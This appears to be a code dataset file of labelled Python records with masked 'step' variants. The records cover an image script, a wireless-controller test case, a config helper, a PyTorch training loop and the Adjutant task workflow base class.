#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2019/6/26 16:11 # @Author : Micky # @Site : # @File : 01_压缩相关知识.py # @Software: PyCharm import numpy as np from PIL import Image from scipy import misc if __name__ == '__main__': # 图像加载 image = Image.open('../datas/xiaoren.png') # 图像转换为numpy数组 img = np.asarray(image) print(img.shape) # 构建一个新的图像 imageNew = np.zeros((600,100,3)) imageNew = imageNew.astype(np.uint8) misc.imsave('m.png',imageNew)
normal
{ "blob_id": "176120d4f40bc02b69d7283b7853b74adf369141", "index": 4726, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n image = Image.open('../datas/xiaoren.png')\n img = np.asarray(image)\n print(img.shape)\n imageNew = np.zeros((600, 100, 3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png', imageNew)\n", "step-3": "import numpy as np\nfrom PIL import Image\nfrom scipy import misc\nif __name__ == '__main__':\n image = Image.open('../datas/xiaoren.png')\n img = np.asarray(image)\n print(img.shape)\n imageNew = np.zeros((600, 100, 3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png', imageNew)\n", "step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/6/26 16:11\n# @Author : Micky\n# @Site : \n# @File : 01_压缩相关知识.py\n# @Software: PyCharm\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy import misc\n\nif __name__ == '__main__':\n # 图像加载\n image = Image.open('../datas/xiaoren.png')\n # 图像转换为numpy数组\n img = np.asarray(image)\n print(img.shape)\n\n # 构建一个新的图像\n imageNew = np.zeros((600,100,3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png',imageNew)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (C) 2011 Ruckus Wireless, Inc. All rights reserved. # Please make sure the following module docstring is accurate since it will be used in report generation. """ Description: @author: Chris Wang @contact: [email protected] @since: Aug-09, 2010 Prerequisite (Assumptions about the state of the test bed/DUT): 1. Build under test is loaded on the Station Required components: 'Station' Test parameters: - zd_tag: zd tag. Will get zd components via zd tag in self.testbed.components. Test procedure: 1. Config: - initialize test parameters 2. Test: - Get limited ZD discovery settings. 3. Cleanup: - N/A Result type: PASS/FAIL Results: PASS: Get limited ZD discovery settings correctly. Messages: If FAIL the test script returns a message related to the criterion that is not satisfied """ import logging from RuckusAutoTest.models import Test from RuckusAutoTest.components.lib.zd import access_points_zd as lib class CB_ZD_Get_Primary_Secondary_ZD(Test): required_components = ['ZoneDirector'] parameters_description = {'zd_tag': "zd tag. Will get zd components via zd tag in self.testbed.components", } ''' Test case for automation. ''' def config(self, conf): self._init_test_params(conf) self._retrive_carrier_bag() def test(self): try: logging.info("Get limited ZD discovery settings via ZD") self.zd_discovery_cfg = lib.get_limited_zd_discovery_cfg(self.zd) logging.info("Limited ZD discovery cfg: %s" % self.zd_discovery_cfg) except Exception, e: self.errmsg = "Fail to get limited ZD discovery: %s" % e.message if self.errmsg: logging.debug(self.errmsg) return self.returnResult("FAIL", self.errmsg) else: self._update_carrier_bag() self.passmsg = "Get limited ZD discovery correctly: %s" % (self.zd_discovery_cfg) return self.returnResult("PASS", self.passmsg) def cleanup(self): pass def _retrive_carrier_bag(self): pass def _update_carrier_bag(self): self.carrierbag['gui_zd_discovery_cfg'] = self.zd_discovery_cfg def _init_test_params(self, conf): self.conf = dict(zd_tag = '') self.conf.update(conf) zd_tag = self.conf.pop('zd_tag') if zd_tag: self.zd = self.carrierbag[zd_tag] else: self.zd = self.testbed.components['ZoneDirector'] self.errmsg = '' self.passmsg = ''
normal
{ "blob_id": "25288a6dd0552d59f8c305bb8edbbbed5d464d5b", "index": 9997, "step-1": "# Copyright (C) 2011 Ruckus Wireless, Inc. All rights reserved.\n# Please make sure the following module docstring is accurate since it will be used in report generation.\n\n\"\"\"\n Description: \n @author: Chris Wang\n @contact: [email protected]\n @since: Aug-09, 2010\n\n Prerequisite (Assumptions about the state of the test bed/DUT):\n 1. Build under test is loaded on the Station\n\n Required components: 'Station'\n Test parameters:\n - zd_tag: zd tag. Will get zd components via zd tag in self.testbed.components.\n \n Test procedure:\n 1. Config:\n - initialize test parameters \n 2. Test:\n - Get limited ZD discovery settings.\n 3. Cleanup:\n - N/A\n \n Result type: PASS/FAIL\n Results: PASS: Get limited ZD discovery settings correctly.\n\n Messages: If FAIL the test script returns a message related to the criterion that is not satisfied\n\"\"\"\nimport logging\n\nfrom RuckusAutoTest.models import Test\nfrom RuckusAutoTest.components.lib.zd import access_points_zd as lib \n\nclass CB_ZD_Get_Primary_Secondary_ZD(Test):\n required_components = ['ZoneDirector']\n parameters_description = {'zd_tag': \"zd tag. Will get zd components via zd tag in self.testbed.components\",\n }\n \n '''\n Test case for automation.\n '''\n def config(self, conf):\n self._init_test_params(conf)\n self._retrive_carrier_bag()\n \n def test(self):\n try:\n logging.info(\"Get limited ZD discovery settings via ZD\")\n self.zd_discovery_cfg = lib.get_limited_zd_discovery_cfg(self.zd)\n logging.info(\"Limited ZD discovery cfg: %s\" % self.zd_discovery_cfg)\n except Exception, e:\n self.errmsg = \"Fail to get limited ZD discovery: %s\" % e.message\n \n if self.errmsg:\n logging.debug(self.errmsg)\n return self.returnResult(\"FAIL\", self.errmsg)\n else:\n self._update_carrier_bag()\n self.passmsg = \"Get limited ZD discovery correctly: %s\" % (self.zd_discovery_cfg)\n return self.returnResult(\"PASS\", self.passmsg)\n \n def cleanup(self):\n pass\n \n def _retrive_carrier_bag(self):\n pass\n \n def _update_carrier_bag(self):\n self.carrierbag['gui_zd_discovery_cfg'] = self.zd_discovery_cfg\n \n def _init_test_params(self, conf):\n self.conf = dict(zd_tag = '')\n self.conf.update(conf)\n \n zd_tag = self.conf.pop('zd_tag')\n if zd_tag:\n self.zd = self.carrierbag[zd_tag]\n else:\n self.zd = self.testbed.components['ZoneDirector']\n \n self.errmsg = ''\n self.passmsg = ''", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from functools import reduce import confuse config = confuse.Configuration('SleepCycleWebhooks') config.set_file('config.yaml') def get(path): return reduce(lambda view, part: view[part], path.split('.'), config).get()
normal
{ "blob_id": "16879598a8b1a0b23c5ea6de18f8fb0b0b77201c", "index": 1360, "step-1": "<mask token>\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-2": "<mask token>\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-3": "<mask token>\nconfig = confuse.Configuration('SleepCycleWebhooks')\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-4": "from functools import reduce\nimport confuse\nconfig = confuse.Configuration('SleepCycleWebhooks')\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
import time import torch from torch.utils.data import DataLoader from nn_model import NNModel def train(dataset: 'Dataset', epochs: int=10): loader = DataLoader(dataset, batch_size=2, shuffle=True) model = NNModel(n_input=2, n_output=3) # model.to(device='cpu') optimizer = torch.optim.Adam(model.parameters(), lr=0.01) criterion = torch.nn.CrossEntropyLoss() start_tm = time.time() for epoch in range(1, epochs+1): train_loss = 0.0 train_acc = 0 for x, y in loader: optimizer.zero_grad() y_pred = model(x) y = torch.max(torch.squeeze(y, dim=1), dim=1).indices loss = criterion(y_pred, y) loss.backward() optimizer.step() train_loss += loss.item() train_acc += (y_pred.argmax(1) == y).sum().item() print(f'[epoch {epoch:02d}]\tloss:{train_loss}\taccuracy:{train_acc}') finish_tm = time.time() print(f'train finished.({finish_tm-start_tm}sec)')
normal
{ "blob_id": "68bcb76a9c736e21cc1f54c6343c72b11e575b5d", "index": 5093, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n model = NNModel(n_input=2, n_output=3)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n start_tm = time.time()\n for epoch in range(1, epochs + 1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm - start_tm}sec)')\n", "step-3": "import time\nimport torch\nfrom torch.utils.data import DataLoader\nfrom nn_model import NNModel\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n model = NNModel(n_input=2, n_output=3)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n start_tm = time.time()\n for epoch in range(1, epochs + 1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm - start_tm}sec)')\n", "step-4": "import time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom nn_model import NNModel\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n\n model = NNModel(n_input=2, n_output=3)\n # model.to(device='cpu')\n\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n \n start_tm = time.time()\n for epoch in range(1, epochs+1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n \n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm-start_tm}sec)')\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (C) 2019 Catalyst Cloud Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import hashlib from logging import getLogger from confspirator import groups from confspirator import fields from adjutant import actions as adj_actions from adjutant.api.models import Task from adjutant.config import CONF from django.utils import timezone from adjutant.notifications.utils import create_notification from adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error from adjutant import exceptions def make_task_config(task_class): config_group = groups.DynamicNameConfigGroup() config_group.register_child_config( fields.BoolConfig( "allow_auto_approve", help_text="Override if this task allows auto_approval. " "Otherwise uses task default.", default=task_class.allow_auto_approve, ) ) config_group.register_child_config( fields.ListConfig( "additional_actions", help_text="Additional actions to be run as part of the task " "after default actions.", default=task_class.additional_actions or [], ) ) config_group.register_child_config( fields.IntConfig( "token_expiry", help_text="Override for the task token expiry. " "Otherwise uses task default.", default=task_class.token_expiry, ) ) config_group.register_child_config( fields.DictConfig( "actions", help_text="Action config overrides over the action defaults. " "See 'adjutant.workflow.action_defaults'.", is_json=True, default=task_class.action_config or {}, sample_default={ "SomeCustomAction": {"some_action_setting": "<a-uuid-probably>"} }, ) ) config_group.register_child_config( fields.DictConfig( "emails", help_text="Email config overrides for this task over task defaults." "See 'adjutant.workflow.emails'.", is_json=True, default=task_class.email_config or {}, sample_default={ "initial": None, "token": { "subject": "Some custom subject", }, }, ) ) config_group.register_child_config( fields.DictConfig( "notifications", help_text="Notification config overrides for this task over task defaults." "See 'adjutant.workflow.notifications'.", is_json=True, default=task_class.notification_config or {}, sample_default={ "standard_handlers": ["EmailNotification"], "error_handlers": ["EmailNotification"], "standard_handler_config": { "EmailNotification": { "emails": ["[email protected]"], "reply": "[email protected]", } }, "error_handler_config": { "EmailNotification": { "emails": ["[email protected]"], "reply": "[email protected]", } }, }, ) ) return config_group class BaseTask(object): """ Base class for in memory task representation. This serves as the internal task logic handler, and is used to define what a task looks like. Most of the time this class shouldn't be called or used directly as the task manager is what handles the direct interaction to the logic here, and includes some wrapper logic to help deal with workflows. """ # required values in custom task task_type = None default_actions = None # default values to optionally override in task definition deprecated_task_types = None duplicate_policy = "cancel" send_approval_notification = True token_requires_authentication = False # config defaults for the task (used to generate default config): allow_auto_approve = True additional_actions = None token_expiry = None action_config = None email_config = None notification_config = None def __init__(self, task_model=None, task_data=None, action_data=None): self._config = None self.logger = getLogger("adjutant") if task_model: self.task = task_model self._refresh_actions() else: # raises 400 validation error action_serializer_list = self._instantiate_action_serializers(action_data) hash_key = self._create_task_hash(action_serializer_list) # raises duplicate error self._handle_duplicates(hash_key) keystone_user = task_data.get("keystone_user", {}) self.task = Task.objects.create( keystone_user=keystone_user, project_id=keystone_user.get("project_id"), task_type=self.task_type, hash_key=hash_key, ) self.task.save() # Instantiate actions with serializers self.actions = [] for i, action in enumerate(action_serializer_list): data = action["serializer"].validated_data # construct the action class self.actions.append( action["action"](data=data, task=self.task, order=i) ) self.logger.info( "(%s) - '%s' task created (%s)." % (timezone.now(), self.task_type, self.task.uuid) ) def _instantiate_action_serializers(self, action_data, use_existing_actions=False): action_serializer_list = [] if use_existing_actions: actions = self.actions else: actions = self.default_actions[:] actions += self.config.additional_actions # instantiate all action serializers and check validity valid = True for action in actions: if use_existing_actions: action_name = action.action.action_name else: action_name = action action_class = adj_actions.ACTION_CLASSES[action_name] if use_existing_actions: action_class = action # instantiate serializer class if not action_class.serializer: raise exceptions.SerializerMissingException( "No serializer defined for action %s" % action_name ) serializer = action_class.serializer(data=action_data) action_serializer_list.append( {"name": action_name, "action": action_class, "serializer": serializer} ) if serializer and not serializer.is_valid(): valid = False if not valid: errors = {} for action in action_serializer_list: if action["serializer"]: errors.update(action["serializer"].errors) raise exceptions.TaskSerializersInvalid(errors) return action_serializer_list def _create_task_hash(self, action_list): hashable_list = [ self.task_type, ] for action in action_list: hashable_list.append(action["name"]) if not action["serializer"]: continue # iterate like this to maintain consistent order for hash fields = sorted(action["serializer"].validated_data.keys()) for field in fields: try: hashable_list.append(action["serializer"].validated_data[field]) except KeyError: if field == "username" and CONF.identity.username_is_email: continue else: raise return hashlib.sha256(str(hashable_list).encode("utf-8")).hexdigest() def _handle_duplicates(self, hash_key): duplicate_tasks = Task.objects.filter( hash_key=hash_key, completed=0, cancelled=0 ) if not duplicate_tasks: return if self.duplicate_policy == "cancel": now = timezone.now() self.logger.info("(%s) - Task is a duplicate - Cancelling old tasks." % now) for task in duplicate_tasks: task.add_task_note( "Task cancelled because was an old duplicate. - (%s)" % now ) task.get_task().cancel() return raise exceptions.TaskDuplicateFound() def _refresh_actions(self): self.actions = [a.get_action() for a in self.task.actions] def _create_token(self): self.clear_tokens() token_expiry = self.config.token_expiry or self.token_expiry token = create_token(self.task, token_expiry) self.add_note("Token created for task.") try: # will throw a key error if the token template has not # been specified email_conf = self.config.emails.token send_stage_email(self.task, email_conf, token) except KeyError as e: handle_task_error(e, self.task, error_text="while sending token") def add_note(self, note): """ Logs the note, and also adds it to the task notes. """ now = timezone.now() self.logger.info( "(%s)(%s)(%s) - %s" % (now, self.task_type, self.task.uuid, note) ) note = "%s - (%s)" % (note, now) self.task.add_task_note(note) @property def config(self): """Get my config. Returns a dict of the config for this task. """ if self._config is None: try: task_conf = CONF.workflow.tasks[self.task_type] except KeyError: task_conf = {} self._config = CONF.workflow.task_defaults.overlay(task_conf) return self._config def is_valid(self, internal_message=None): self._refresh_actions() valid = all([act.valid for act in self.actions]) if not valid: # TODO(amelia): get action invalidation reasons and raise those raise exceptions.TaskActionsInvalid( self.task, "actions invalid", internal_message ) @property def approved(self): return self.task.approved @property def completed(self): return self.task.completed @property def cancelled(self): return self.task.cancelled def confirm_state(self, approved=None, completed=None, cancelled=None): """Check that the Task is in a given state. None value means state is ignored. Otherwise expects true or false. """ if completed is not None: if self.task.completed and not completed: raise exceptions.TaskStateInvalid( self.task, "This task has already been completed." ) if not self.task.completed and completed: raise exceptions.TaskStateInvalid( self.task, "This task hasn't been completed." ) if cancelled is not None: if self.task.cancelled and not cancelled: raise exceptions.TaskStateInvalid( self.task, "This task has been cancelled." ) if not self.task.cancelled and cancelled: raise exceptions.TaskStateInvalid( self.task, "This task has not been cancelled." ) if approved is not None: if self.task.approved and not approved: raise exceptions.TaskStateInvalid( self.task, "This task has already been approved." ) if not self.task.approved and approved: raise exceptions.TaskStateInvalid( self.task, "This task has not been approved." ) def update(self, action_data): self.confirm_state(approved=False, completed=False, cancelled=False) action_serializer_list = self._instantiate_action_serializers( action_data, use_existing_actions=True ) hash_key = self._create_task_hash(action_serializer_list) self._handle_duplicates(hash_key) for action in action_serializer_list: data = action["serializer"].validated_data action["action"].action.action_data = data action["action"].action.save() self._refresh_actions() self.prepare() def prepare(self): """Run the prepare stage for all the actions. If the task can be auto approved, this will also run the approve stage. """ self.confirm_state(approved=False, completed=False, cancelled=False) for action in self.actions: try: action.prepare() except Exception as e: handle_task_error(e, self.task, error_text="while setting up task") # send initial confirmation email: email_conf = self.config.emails.initial send_stage_email(self.task, email_conf) approve_list = [act.auto_approve for act in self.actions] # TODO(amelia): It would be nice to explicitly test this, however # currently we don't have the right combinations of # actions to allow for it. if False in approve_list: can_auto_approve = False elif True in approve_list: can_auto_approve = True else: can_auto_approve = False if self.config.allow_auto_approve is not None: allow_auto_approve = self.config.allow_auto_approve else: allow_auto_approve = self.allow_auto_approve if can_auto_approve and not allow_auto_approve: self.add_note("Actions allow auto aproval, but task does not.") elif can_auto_approve: self.add_note("Action allow auto approval. Auto approving.") self.approve() return if self.send_approval_notification: notes = {"notes": ["'%s' task needs approval." % self.task_type]} create_notification(self.task, notes) def approve(self, approved_by="system"): """Run the approve stage for all the actions.""" self.confirm_state(completed=False, cancelled=False) self.is_valid("task invalid before approval") # We approve the task before running actions, # that way if something goes wrong we know if it was approved, # when it was approved, and who approved it. self.task.approved = True self.task.approved_on = timezone.now() self.task.approved_by = approved_by self.task.save() # approve all actions for action in self.actions: try: action.approve() except Exception as e: handle_task_error(e, self.task, error_text="while approving task") self.is_valid("task invalid after approval") need_token = any([act.need_token for act in self.actions]) if need_token: self._create_token() else: self.submit() def reissue_token(self): self.confirm_state(approved=True, completed=False, cancelled=False) need_token = any([act.need_token for act in self.actions]) if need_token: self._create_token() def clear_tokens(self): for token in self.task.tokens: token.delete() def submit(self, token_data=None, keystone_user=None): self.confirm_state(approved=True, completed=False, cancelled=False) required_fields = set() actions = [] for action in self.task.actions: a = action.get_action() actions.append(a) for field in a.token_fields: required_fields.add(field) if not token_data: token_data = {} errors = {} data = {} for field in required_fields: try: data[field] = token_data[field] except KeyError: errors[field] = [ "This field is required.", ] except TypeError: errors = ["Improperly formated json. " "Should be a key-value object."] break if errors: raise exceptions.TaskTokenSerializersInvalid(self.task, errors) self.is_valid("task invalid before submit") for action in actions: try: action.submit(data, keystone_user) except Exception as e: handle_task_error(e, self.task, "while submiting task") self.is_valid("task invalid after submit") self.task.completed = True self.task.completed_on = timezone.now() self.task.save() for token in self.task.tokens: token.delete() # Sending confirmation email: email_conf = self.config.emails.completed send_stage_email(self.task, email_conf) def cancel(self): self.confirm_state(completed=False, cancelled=False) self.clear_tokens() self.task.cancelled = True self.task.save()
normal
{ "blob_id": "cc23eeed44ff66d68c700163cca8b9f4986d497d", "index": 7681, "step-1": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n <mask token>\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n <mask token>\n <mask token>\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been approved.')\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been approved.')\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n for action in action_serializer_list:\n data = action['serializer'].validated_data\n action['action'].action.action_data = data\n action['action'].action.save()\n self._refresh_actions()\n self.prepare()\n <mask token>\n\n def approve(self, approved_by='system'):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n self.confirm_state(completed=False, cancelled=False)\n self.is_valid('task invalid before approval')\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\n 'while approving task')\n self.is_valid('task invalid after approval')\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n <mask token>\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n if not token_data:\n token_data = {}\n errors = {}\n data = {}\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = ['This field is required.']\n except TypeError:\n errors = [\n 'Improperly formated json. Should be a key-value object.']\n break\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n self.is_valid('task invalid before submit')\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, 'while submiting task')\n self.is_valid('task invalid after submit')\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass BaseTask(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger('adjutant')\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n action_serializer_list = self._instantiate_action_serializers(\n action_data)\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n keystone_user = task_data.get('keystone_user', {})\n self.task = Task.objects.create(keystone_user=keystone_user,\n project_id=keystone_user.get('project_id'), task_type=self.\n task_type, hash_key=hash_key)\n self.task.save()\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action['serializer'].validated_data\n self.actions.append(action['action'](data=data, task=self.\n task, order=i))\n self.logger.info(\"(%s) - '%s' task created (%s).\" % (timezone.\n now(), self.task_type, self.task.uuid))\n <mask token>\n\n def _create_task_hash(self, action_list):\n hashable_list = [self.task_type]\n for action in action_list:\n hashable_list.append(action['name'])\n if not action['serializer']:\n continue\n fields = sorted(action['serializer'].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action['serializer'].\n validated_data[field])\n except KeyError:\n if field == 'username' and CONF.identity.username_is_email:\n continue\n else:\n raise\n return hashlib.sha256(str(hashable_list).encode('utf-8')).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(hash_key=hash_key, completed=\n 0, cancelled=0)\n if not duplicate_tasks:\n return\n if self.duplicate_policy == 'cancel':\n now = timezone.now()\n self.logger.info(\n '(%s) - Task is a duplicate - Cancelling old tasks.' % now)\n for task in duplicate_tasks:\n task.add_task_note(\n 'Task cancelled because was an old duplicate. - (%s)' % now\n )\n task.get_task().cancel()\n return\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note('Token created for task.')\n try:\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text='while sending token')\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info('(%s)(%s)(%s) - %s' % (now, self.task_type, self.\n task.uuid, note))\n note = '%s - (%s)' % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n raise exceptions.TaskActionsInvalid(self.task,\n 'actions invalid', internal_message)\n\n @property\n def approved(self):\n return self.task.approved\n <mask token>\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has already been completed.')\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(self.task,\n \"This task hasn't been completed.\")\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has been cancelled.')\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(self.task,\n 'This task has not been cancelled.')\n if approved is not None:\n if 